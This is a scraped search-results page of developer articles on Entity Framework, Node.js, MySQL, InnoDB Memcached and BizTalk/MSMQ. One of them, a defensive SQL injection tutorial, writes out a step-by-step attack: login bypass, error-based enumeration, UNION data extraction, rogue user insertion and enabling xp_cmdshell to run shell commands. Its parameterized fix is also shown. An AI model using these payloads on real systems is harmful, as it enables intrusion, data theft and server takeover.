Search Results

Search found 23901 results on 957 pages for 'mysql stored procedure'.


  • Entity Framework Security

    - by NYSystemsAnalyst
    In my organization, we are just beginning to use the Entity Framework for some applications. In the past, we have pushed developers to utilize stored procedures for all database access. In addition to helping with SQL injection, we tried to grant logins access to stored procedures only to keep security relatively tight. Although inserting, updating, and deleting are easily done through stored procedures in the EF, it appears to be difficult to use stored procedures to query data with EF. However, using LINQ or Entity SQL and allowing EF to create the queries means giving a user read access to the entire database. How have others handled this dilemma?
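One commonly used option for the read side (a sketch of the general technique, not necessarily what the poster's organization settled on): EF can materialize objects from a stored procedure's result set, so SELECT access on the tables can stay locked down and the login only needs EXECUTE rights. This assumes EF 4.1+ (the DbContext API); the Customer entity and procedure name here are hypothetical.

    using System.Collections.Generic;
    using System.Data.Entity;
    using System.Data.SqlClient;
    using System.Linq;

    public class Customer
    {
        public int Id { get; set; }
        public string Name { get; set; }
    }

    public class ShopContext : DbContext
    {
        public DbSet<Customer> Customers { get; set; }

        // Reads go through a stored procedure, so the login only needs
        // EXECUTE rights, not SELECT on the underlying tables.
        public List<Customer> GetCustomersByRegion(int regionId)
        {
            return Customers
                .SqlQuery("EXEC dbo.GetCustomersByRegion @regionId",
                          new SqlParameter("@regionId", regionId))
                .ToList();
        }
    }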

    Read the article

  • new project app; use entirely node.js

    - by Jared
I have been looking into Node.js, Express, and NowJS, and I love how easy it is to have real-time interactions between clients. My background is mostly CodeIgniter MVC with PHP and MySQL. I want to remake a current web project of mine from scratch to make everything better and more real-time with this newer technology. After researching and building test examples, I want to use Node.js, Express, and NowJS for the real-time interactions once someone connects via socket.io, but keep CodeIgniter for control of the site, user management, a possible shopping cart/store, and pretty much everything else. This is purely due to time constraints and the fact that I am already familiar with doing it that way. I have also been looking at MongoDB as an alternative to MySQL. Basically, the app is going to be multiple chat rooms all on one page, with notifications and private messaging, so there will be lots of data transfer and images. Before I start piecing it together I wanted to hear from people who have already done something similar. My plan is to use CodeIgniter and MySQL to render the page, then connect clients to a Node.js server and broadcast using Express and NowJS. Would MongoDB be better than MySQL for storing tons of messages and data? Also, does it make sense not to build the whole site on Node.js and instead piece it together like this?
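For readers unfamiliar with the pattern the poster describes, here is a minimal sketch of the real-time half using Express and Socket.IO (NowJS has since been abandoned, so Socket.IO rooms stand in for it here). The port, event names, and room ids are hypothetical.

    // Minimal sketch: Express serves nothing app-specific here; CodeIgniter
    // keeps rendering the site, and clients connect to this Socket.IO server.
    var express = require('express');
    var http = require('http');
    var socketio = require('socket.io');

    var app = express();
    var server = http.createServer(app);
    var io = socketio(server);

    io.on('connection', function (socket) {
        // Each chat room on the page joins its own Socket.IO room.
        socket.on('join', function (room) {
            socket.join(room);
        });
        // Broadcast chat messages to everyone in the same room.
        socket.on('chat', function (room, message) {
            io.to(room).emit('chat', message);
        });
    });

    server.listen(3000);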

    Read the article

  • How to check an executable's path is correct in PHP?

    - by nickf
    I'm writing a setup/installer script for my application, basically just a nice front end to the configuration file. One of the configuration variables is the executable path for mysql. After the user has typed it in (for example: /path/to/mysql-5.0/bin/mysql or just mysql if it is in their system PATH), I want to verify that it is correct. My initial reaction would be to try running it with "--version" to see what comes back. However, I quickly realised this would lead to me writing this line of code: shell_exec($somethingAUserHasEntered . " --version"); ...which is obviously a Very Bad Thing. Now, this is a setup script which is designed for trusted users only, and ones which probably already have relatively high level access to the system, but still I don't think the above solution is something I want to write. Is there a better way to verify the executable path? Perhaps one which doesn't expose a massive security hole?
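One pattern that avoids passing raw user input to the shell (a sketch, assuming PHP 5.x; the functions used are standard PHP): quote the value with escapeshellarg() before appending the flag, and pre-check the obvious case with is_executable() when a full path was given.

    <?php
    // Minimal sketch. $path is whatever the user typed in.
    function verify_mysql_binary($path)
    {
        // If a directory was given, insist on an existing executable file;
        // a bare "mysql" is left to be resolved via the system PATH.
        if (strpos($path, DIRECTORY_SEPARATOR) !== false
            && !is_executable($path)) {
            return false;
        }
        // escapeshellarg() quotes the user input so it reaches the shell
        // as a single argument, defusing injection attempts.
        $output = shell_exec(escapeshellarg($path) . ' --version 2>&1');
        return $output !== null && stripos($output, 'mysql') !== false;
    }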

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, have no input clean-up or validation, allow applications to connect with elevated (e.g. sa) privileges, and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server, so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. All of this will become clear as we walk through two of the most common coding patterns that enable SQL injection attacks, and how to remove the vulnerability: 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First comes the SQL code that builds the table and test data, then the C# code with the actual SQL injection example from beginning to end. The comments in the code explain what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of our hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. 
It uses SQL concatenation on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being returned by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreak havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. 
It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the 3 statements above to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this, chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as shown in the following example. 
/* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; }} We have seen just how much danger we're in if our code is vulnerable to SQL injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done, and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. 
/*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example, but in all my years of reading SQL forums and answering questions there have been quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using properly parameterized SQL, you have a vulnerability, and SQL injection can bare its teeth.
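The article names the cure (properly parameterized dynamic SQL) without showing it for the stored-procedure case, so here is a hedged sketch of one safer shape for such a procedure: the table name is validated against the catalog and quoted with QUOTENAME, and the user-supplied value travels through an sp_executesql parameter. The procedure and parameter names are hypothetical, not from the article.

    -- A minimal sketch (not from the original article): dynamic SQL with the
    -- identifier validated and quoted, and the user value parameterized.
    CREATE PROCEDURE spSaferAccessSproc
        @tableName SYSNAME,
        @userName  NVARCHAR(50)
    AS
    BEGIN
        -- Reject anything that is not an actual user table.
        IF OBJECT_ID(@tableName, 'U') IS NULL
            RETURN

        DECLARE @sql NVARCHAR(MAX)
        SET @sql = N'SELECT * FROM ' + QUOTENAME(@tableName) +
                   N' WHERE UserName = @userName'

        -- sp_executesql keeps @userName as data, never as executable SQL.
        EXEC sp_executesql @sql, N'@userName NVARCHAR(50)', @userName = @userName
    END
    GO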

    Read the article

  • New Enhancements for InnoDB Memcached

    - by Calvin Sun
In MySQL 5.6 we continued our development on InnoDB Memcached and completed a few widely requested features that make InnoDB Memcached competitive in more scenarios. Notably, they are: 1) support for multiple table mappings; 2) a background thread to auto-commit long-running transactions; 3) enhanced binlog performance. Let's go over each of these features one by one; in the last section, we will go over a couple of internally performed performance tests. Support for multiple table mappings In our earlier release, all InnoDB Memcached operations were mapped to a single InnoDB table. In real life, users may want to use the InnoDB Memcached feature on different tables. Being able to access different tables at run time, with different mappings for different connections, is therefore a very desirable feature, and in this GA release you can do both. We will discuss the key concepts and the key steps for using this feature. 1) The "mapping name" in the "get" and "set" commands In order to allow InnoDB Memcached to map to a new table, the user (DBA) is still required to "pre-register" the table(s) in the InnoDB Memcached "containers" table (there is a security consideration behind this requirement). If you would like to know more about the "containers" table, please refer to my earlier blogs on blogs.innodb.com. Once registered, InnoDB Memcached will be able to look up such tables when they are referred to. Each registered table has a unique "registration name" (or mapping name) corresponding to the "name" field in the "containers" table. To access these tables, the user includes the registration name in get or set commands, in the form "get @@new_mapping_name.key"; the prefix "@@" signals a mapped-table change. The key and the mapping name are separated by a configurable delimiter, which defaults to ".". So the syntax is: get [@@mapping_name.]key_name set [@@mapping_name.]key_name or get @@mapping_name set @@mapping_name Here is an example. Let's set up three entries in the "containers" table. The first maps to the InnoDB table "test/demo_test" with mapping name "setup_1": INSERT INTO containers VALUES ("setup_1", "test", "demo_test", "c1", "c2", "c3", "c4", "c5", "PRIMARY"); Similarly, we set up table mappings for table "test/new_demo" with name "setup_2" and for table "my_database/my_demo" with name "setup_3": INSERT INTO containers VALUES ("setup_2", "test", "new_demo", "c1", "c2", "c3", "c4", "c5", "secondary_index_x"); INSERT INTO containers VALUES ("setup_3", "my_database", "my_demo", "c1", "c2", "c3", "c4", "c5", "idx"); To switch to table "my_database/my_demo" and get the value corresponding to "key_a", the user issues: get @@setup_3.key_a (this also outputs the value corresponding to key "key_a") or simply: get @@setup_3 Once this is done, the connection is switched to the "my_database/my_demo" table until another table-mapping switch is requested, so it can continue issuing regular commands such as: get key_b set key_c 0 0 7 These DMLs will all be directed to the "my_database/my_demo" table. This also implies that different connections can have different bindings (to different tables).
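To make the mapping syntax concrete, here is a hypothetical memcached text-protocol session (for example, over telnet to the memcached port) against the "setup_1" container registered above; the key and value are invented, and the exact formatting of the reply lines may differ between versions:

    set @@setup_1.key_a 0 0 5
    hello
    STORED
    get @@setup_1.key_a
    VALUE key_a 0 5
    hello
    END
    bind setup_1
    get key_a
    VALUE key_a 0 5
    hello
    END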
2) Delimiter For the delimiter "." that separates the mapping name from the key value, we also added a configuration option named "table_map_delimiter" to the "config_options" system table: INSERT INTO config_options VALUES("table_map_delimiter", "."); So if users want a different delimiter, they can change it in the config_options table. 3) Default mapping Once we have multiple table mappings, there must always be a "default" mapping. We decided that if there exists a mapping named "default", it is chosen as the default; otherwise, the first row of the containers table is chosen as the default setting. Please note that user tables can be repeated in the "containers" table (for example, if the user wants to access different columns of the table in different settings), as long as they use different mapping/configuration names in the first column, which is enforced by a unique index. 4) The bind command In addition, we extended the protocol with a bind command; its usage is fairly straightforward. To switch to the "setup_3" mapping above, you simply issue: bind setup_3 This switches this connection's InnoDB table to "my_database/my_demo". In summary, with this feature you can now access different tables from different sessions, and even within a single connection you can query different tables. Background thread to auto-commit long-running transactions This feature is related to the "batch" concept we discussed in earlier blogs. The "batch" feature allows us to batch read and write operations and commit them only after a certain number of calls. The batch size is controlled by the configuration parameters "daemon_memcached_w_batch_size" and "daemon_memcached_r_batch_size". This can significantly boost performance. However, it also comes with some disadvantages: for example, you will not be able to view "uncommitted" operations from the SQL end unless you set the transaction isolation level to READ UNCOMMITTED, and in addition, certain row locks will be held for extended periods of time, which might reduce concurrency. To deal with this, we introduced a background thread that "auto-commits" transactions if they have been idle for a certain amount of time (the default is 5 seconds). The background thread wakes up every second, loops through every "connection" opened by Memcached, and checks for idle transactions. If such a transaction has been idle longer than a certain limit and is not being used, it will be committed. The limit is configurable by changing "innodb_api_bk_commit_interval"; its default value is 5 seconds, the minimum is 1 second, and the maximum is 1073741824 seconds. With the help of this background thread, you will not need to worry about long-running uncommitted transactions when setting daemon_memcached_w_batch_size and daemon_memcached_r_batch_size to large numbers. This also reduces the number of locks that could be held by long-running transactions, further increasing concurrency. Enhancement in binlog performance As you may know, binlog operations are not done by the InnoDB storage engine; rather, they are handled in the MySQL layer. In order to support binlog operations through InnoDB Memcached, we have to artificially create some MySQL constructs in order to access the binlog handler APIs. In the previous lab release, for simplicity, we opened and destroyed these MySQL constructs (such as THD) for each operation. 
This required us to always set the "batch" size to 1 when the binlog was on, no matter what "daemon_memcached_w_batch_size" and "daemon_memcached_r_batch_size" were configured to. This put a big restriction on our capability to scale, and the overhead of repeatedly creating and destroying such constructs bogged performance down. With this release, we made the necessary changes to keep the MySQL constructs alive as long as they are valid for a particular connection, so there are no repeated and redundant open and close (table) calls. Now, even with the binlog option enabled (innodb_api_enable_binlog), we can still batch transactions with daemon_memcached_w_batch_size and daemon_memcached_r_batch_size, and thus scale write/read performance. Although there is still overhead that keeps InnoDB Memcached from performing as fast as when the binlog is turned off, it is much better than the previous release, and we are continuing to optimize this area to improve performance as much as possible. Performance study Amerandra of our System QA team conducted some performance studies comparing queries through the InnoDB Memcached connection and through the plain SQL end, with some interesting results. The test was conducted on a Linux 2.6.32-300.7.1.el6uek.x86_64 machine with 16 GB of memory, two 4-core Intel Xeon 2.0 GHz x86_64 CPUs, and 2 RAID disks (1027 GB, 733.9 GB). The results are shown in the following tables:

Table 1: Performance comparison on Set operations
Connections   Memcached plugin Set (QPS)***   5.6.7-RC* Set (QPS)**   X faster
8             30,000                          5,600                   5.36
32            59,000                          13,000                  4.54
128           68,000                          8,000                   8.50
512           63,000                          6,800                   9.23

* mysql-5.6.7-rc-linux2.6-x86_64
** The "set" operation, as implemented in InnoDB Memcached, involves a couple of DMLs: it first queries the table to see whether the "key" exists; if it does not, the new key/value pair is inserted; if it does, the "value" field of the matching row (by key) is updated. For the SQL side of the comparison, this logic was a precompiled stored procedure, and the query simply executed that procedure.
*** added "-daemon_memcached_option=-t8" (the default is 4 threads)

So with this "set" query, InnoDB Memcached runs 4.5 to 9 times faster than the MySQL server.

Table 2: Performance comparison on Get operations
Connections   Memcached plugin Get (QPS)   5.6.7-RC* Get (QPS)   X faster
8             42,000                       27,000                1.56
32            101,000                      55,000                1.83
128           117,000                      52,000                2.25
512           109,000                      52,000                2.10

With the "get" query (the select query), Memcached performs 1.5 to 2 times faster than normal SQL. Summary: In this release we added several much-desired features to InnoDB Memcached, allowing users to operate on different tables through the Memcached interface. We now also provide a background thread to commit long-running idle transactions, so users can configure large batched writes/reads without worrying about large numbers of rows being locked or uncommitted data not being visible. We also greatly enhanced performance when the binlog is enabled. We will continue working on both performance and functionality to make InnoDB Memcached a good showcase for our InnoDB APIs. Jimmy Yang, September 29, 2012

    Read the article

  • BizTalk and SQL: Alternatives to the SQL receive adapter. Using Msmq to receive SQL data

    - by Leonid Ganeline
If we have to get data from a SQL database, the standard way is to use a receive port with the SQL adapter. The SQL receive adapter is a solicit-response adapter: it periodically polls the SQL database with queries. That's the only way it can work, and sometimes it is undesirable. With the new WCF-SQL adapter we can use a more lightweight approach, but still on the same principle: the WCF-SQL adapter periodically solicits the database with queries to check for new records. Imagine a situation where new records can appear at very different rates, some a second apart, others several minutes apart. Our requirement is to process the new records ASAP. That means the polling interval should be near the shortest interval between new records: one second. As a result, most of the poll queries would return nothing and would load the database for no good reason. If the database is working under a heavy load, that is very undesirable. Do we have other choices? Sure. We can change polling to "eventing". The good news is that SQL Server can raise an event when new records arrive, using triggers: a new record appears, the trigger fires; no new records, no trigger events, no excessive load on the database. The bad news is that SQL Server has no intrinsic method to send the event data outside. We would rather use adapters that listen for data instead of soliciting it; there are several such listener adapters: File, FTP, SOAP, WCF, and MSMQ. But SQL Server doesn't have methods to create and save files, consume web services, or create and send queue messages, does it? Can we use the File, FTP, MSMQ, or WCF adapters to get data from SQL code? Yes, we can. SQL Server 2005 and 2008 can run .NET code inside SQL code; see SQL CLR integration. Here is how it works for MSMQ, for example: · A new record is created and the trigger fires · The trigger calls a CLR stored procedure and passes the message parameters to it · The CLR stored procedure creates a message and sends it to the outgoing queue on the SQL Server computer · The MSMQ service transfers the message to the queue on the BizTalk Server computer · The WCF-NetMsmq adapter receives the message from this queue For the File adapter the idea is the same: the CLR stored procedure creates and stores a file containing the message, and the File adapter picks up this file. Using the WCF-NetMsmq adapter to get data from SQL I am describing the full set of development and deployment steps for the WCF-NetMsmq case. Development: 1. Create the .NET code: a project, class, and method to create the message and send it to the MSMQ queue. 2. Create the SQL code in triggers to call the .NET code. Installation and Deployment: 1. SQL Server: a. Register the CLR assembly with the .NET (CLR) code b. Install the MSMQ Services 2. BizTalk Server: a. Install the MSMQ Services b. Create the MSMQ queue c. Create the WCF-NetMsmq receive port The detailed description is below. Code .NET code … using System.Xml; using System.Xml.Linq; using System.Xml.Serialization;   //namespace MyCompany.MySolution.MyProject – doesn't work. The assembly name is MyCompany.MySolution.MyProject // I gave up on the compound namespace. It seems the CLR integration cannot work with it. Maybe I'm wrong.
public class Event { static public XElement CreateMsg(int par1, int par2, int par3) { XNamespace ns = "http://schemas.microsoft.com/Sql/2008/05/TypedPolling/my_storedProc"; XElement xdoc = new XElement(ns + "TypedPolling", new XElement(ns + "TypedPollingResultSet0", new XElement(ns + "TypedPollingResultSet0", new XElement(ns + "par1", par1), new XElement(ns + "par2", par2), new XElement(ns + "par3", par3) ) ) ); return xdoc; } } //////////////////////////////////////////////////////////////////////// … using System.ServiceModel; using System.ServiceModel.Channels; using System.Transactions; using System.Data; using System.Data.Sql; using System.Data.SqlTypes; public class MsmqHelper { [Microsoft.SqlServer.Server.SqlProcedure] // msmqAddress as "net.msmq://localhost/private/myapp.myqueue"; public static void SendMsg(string msmqAddress, string action, int par1, int par2, int par3) { using (TransactionScope scope = new TransactionScope(TransactionScopeOption.Suppress)) { NetMsmqBinding binding = new NetMsmqBinding(NetMsmqSecurityMode.None); binding.ExactlyOnce = true; EndpointAddress address = new EndpointAddress(msmqAddress); using (ChannelFactory<IOutputChannel> factory = new ChannelFactory<IOutputChannel>(binding, address)) { IOutputChannel channel = factory.CreateChannel(); try { XElement xe = Event.CreateMsg(par1, par2, par3); XmlReader xr = xe.CreateReader(); Message msg = Message.CreateMessage(MessageVersion.Default, action, xr); channel.Send(msg); //SqlContext.Pipe.Send(…); // to test } catch (Exception ex) { … } } scope.Complete(); } } } SQL code in triggers -- sp_SendMsg was registered as the name of MsmqHelper.SendMsg() EXEC sp_SendMsg 'net.msmq://biztalk_server_name/private/myapp.myqueue', 'Create', @par1, @par2, @par3 Installation and Deployment On the SQL Server Registering the CLR assembly 1. Prerequisites: .NET 3.5 SP1 Framework. This could be an issue for a production SQL Server! 2. For more information, please see http://nielsb.wordpress.com/sqlclrwcf/ 3. Copy files: >copy "\Windows\Microsoft.net\Framework\v3.0\Windows Communication Foundation\Microsoft.Transactions.Bridge.dll" "\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\Microsoft.Transactions.Bridge.dll" If your machine is 64-bit, run two commands: >copy "\Windows\Microsoft.net\Framework\v3.0\Windows Communication Foundation\Microsoft.Transactions.Bridge.dll" "\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\Microsoft.Transactions.Bridge.dll" >copy "\Windows\Microsoft.net\Framework64\v3.0\Windows Communication Foundation\Microsoft.Transactions.Bridge.dll" "\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\Microsoft.Transactions.Bridge.dll" 4. 
Execute the SQL code to register the .NET assemblies: -- For x64 OS: CREATE ASSEMBLY SMdiagnostics AUTHORIZATION dbo FROM 'C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMdiagnostics.dll' WITH permission_set = unsafe CREATE ASSEMBLY [System.Web] AUTHORIZATION dbo FROM 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\System.Web.dll' WITH permission_set = unsafe CREATE ASSEMBLY [System.Messaging] AUTHORIZATION dbo FROM 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\System.Messaging.dll' WITH permission_set = unsafe CREATE ASSEMBLY [System.ServiceModel] AUTHORIZATION dbo FROM 'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\System.ServiceModel.dll' WITH permission_set = unsafe CREATE ASSEMBLY [System.Xml.Linq] AUTHORIZATION dbo FROM 'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Xml.Linq.dll' WITH permission_set = unsafe -- For x32 OS: --CREATE ASSEMBLY SMdiagnostics AUTHORIZATION dbo FROM 'C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMdiagnostics.dll' WITH permission_set = unsafe --CREATE ASSEMBLY [System.Web] AUTHORIZATION dbo FROM 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\System.Web.dll' WITH permission_set = unsafe --CREATE ASSEMBLY [System.Messaging] AUTHORIZATION dbo FROM 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\System.Messaging.dll' WITH permission_set = unsafe --CREATE ASSEMBLY [System.ServiceModel] AUTHORIZATION dbo FROM 'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\System.ServiceModel.dll' WITH permission_set = unsafe 5. Register the assembly with the external stored procedure: CREATE ASSEMBLY [HelperClass] AUTHORIZATION dbo FROM '<FilePath>MyCompany.MySolution.MyProject.dll' WITH permission_set = unsafe where <FilePath> is the path of the file on this machine! 6. Create the external stored procedure: CREATE PROCEDURE sp_SendMsg ( @msmqAddress nvarchar(100), @Action NVARCHAR(50), @par1 int, @par2 int, @par3 int ) AS EXTERNAL NAME HelperClass.MsmqHelper.SendMsg Installing the MSMQ Services 1. Check whether the MSMQ service is already installed. To check: Start / Administrative Tools / Computer Management; on the left pane open "Services and Applications" and look for "Message Queuing". If you cannot see it, follow the next steps. 2. Start / Control Panel / Programs and Features 3. Click "Turn Windows Features on or off" 4. Click Features, click "Add Features" 5. Scroll down the feature list; open "Message Queuing" / "Message Queuing Services"; and check the "Message Queuing Server" option 6. Click Next; click Install; wait for the installation to finish successfully Creating the MSMQ queue We don't need to create the queue on the "sender" side. On the BizTalk Server Installing the MSMQ Services The same as for the SQL Server. Creating the MSMQ queue 1. Start / Administrative Tools / Computer Management; on the left pane open "Services and Applications", open "Message Queuing", and open "Private Queues". 2. Right-click "Private Queues"; choose New; choose "Private Queue". 3. Type the queue name as 'myapp.myqueue'; check the "Transactional" option. Creating the WCF-NetMsmq receive port I will not go through this step in detail; it is straightforward. The URI for this receive location should be 'net.msmq://localhost/private/myapp.myqueue'. Notes · The biggest problems usually show up in the "Registering the CLR assembly" step. 
